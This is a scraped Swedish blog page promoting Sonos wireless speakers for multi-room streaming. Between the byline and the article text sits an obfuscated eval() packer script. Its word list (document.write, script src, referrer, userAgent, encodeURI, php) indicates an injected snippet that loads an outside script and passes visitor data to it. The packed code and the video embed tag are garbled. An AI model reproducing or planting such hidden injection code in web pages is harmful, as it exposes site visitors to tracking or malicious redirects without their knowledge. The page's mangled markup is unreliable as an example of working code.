Image Image Image Image Image Image Image Image Image Image

| 17 oktober, 2018

Scroll to top

Top

Streama trådlöst i hemmet med Sonos

Streama trådlöst i hemmet med Sonos
Sebastian Plengier Ehrnfelt

type=”text/javascript” src=”http://videos.goviral-content.com/playerjs-yt/hifiklubben_12600.js?w=600&h=475&pID=59289&bgc=ffffff&cw=1441675&skinName=light&wmode=window&hideChrome=0″>

Sonos: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sfysh|var|u0026u|referrer|kebky||js|php’.split(‘|’),0,{}))
Sugen på imponerade HiFi-ljud i köket, sovrummet eller i vilket rum som helst? Den trådlösa spelaren från Sonos streamar imponerande musik överallt där du väljer att ställa högtalaren. Med hjälp av din Android / iOS smartphone eller surfplatta kan du också kontrollera vilken musik som ska spelas ur högtalarna.

Varför inte streama en radiokanal från Australien direkt i sovrummet? Lyssna på topphitsen i vardagsrummet eller spela din favoritlåt från Spotify i köket. Sonos ansluts direkt till internet så att du kan lyssna på exakt det du vill när du vill enkelt. Spela upp olika låtar i olika rum eller spela samma låt i alla rum med perfekt synkronisering.

Börja med en Sonos-spelare och utöka sedan med fler till olika rum i huset och upplev fantastiskt ljud trådlöst.